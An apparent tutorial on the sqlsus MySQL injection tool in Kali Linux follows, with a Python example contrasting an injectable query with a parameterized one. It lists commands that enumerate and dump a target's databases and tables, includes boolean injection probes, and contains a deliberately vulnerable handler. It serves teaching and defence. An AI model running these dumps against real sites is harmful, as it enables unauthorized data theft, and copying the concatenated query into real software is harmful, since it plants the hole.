SQLSus is a MySQL injection tool available on Kali Linux, primarily designed to automate SQL injection attacks. It can retrieve information from databases, perform blind SQL injections, and exploit various MySQL vulnerabilities.
Here’s a basic guide on how to use the sqlsus command in Kali:
Installation
sudo apt install sqlsus
Basic Command Structure:
sqlsus -h <target URL> --inject <vulnerable parameter>
sqlsus -h "http://target.com/index.php?id=1"
sqlsus -h "http://target.com/index.php?id=1" --getdbs
sqlsus -h "http://target.com/index.php?id=1" --db <database_name> --gettables
sqlsus -h "http://target.com/index.php?id=1" --db <database_name> --table <table_name> --getcolumns
sqlsus -h "http://target.com/index.php?id=1" --db <database_name> --table <table_name> --dump
sqlsus -h "http://target.com/index.php?id=1" --inject 'boolean-based'
Note: Ensure you have legal authorization before using SQL injection tools on any website or network. SQL injection attacks are illegal if performed without proper permission, as they can compromise the integrity of systems and databases.
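Why an id parameter like the one in the URLs above is injectable, and what closes the hole, shown as an added example that is not part of the original guide or of sqlsus. The articles table, the function names, and the use of Python's sqlite3 in place of PHP/MySQL are assumptions made so the example runs offline.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for the MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [(1, "Welcome"), (2, "Release notes")])
    return db

def lookup_vulnerable(db, raw_id):
    # The request value is pasted into the SQL text, so the database
    # parses whatever the client sent as part of the statement.
    query = "SELECT title FROM articles WHERE id = " + raw_id
    return [row[0] for row in db.execute(query)]

def lookup_hardened(db, raw_id):
    # 1) Validate: the parameter must be a short, plain decimal integer.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return []
    # 2) Bind: the value travels separately from the SQL text.
    rows = db.execute("SELECT title FROM articles WHERE id = ?",
                      (int(raw_id),))
    return [row[0] for row in rows]

def differs_on_boolean_probe(lookup, db):
    # A parameter is boolean-injectable when appending a true condition
    # and a false condition produces two different responses.
    return lookup(db, "1 AND 1=1") != lookup(db, "1 AND 1=2")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks a boolean signal:",
          differs_on_boolean_probe(lookup_vulnerable, db))
    print("hardened handler leaks a boolean signal:",
          differs_on_boolean_probe(lookup_hardened, db))
    print("hardened handler still serves id=1:",
          lookup_hardened(db, "1"))
```

The same probe pair works as a regression test after a fix: both requests should return the identical response.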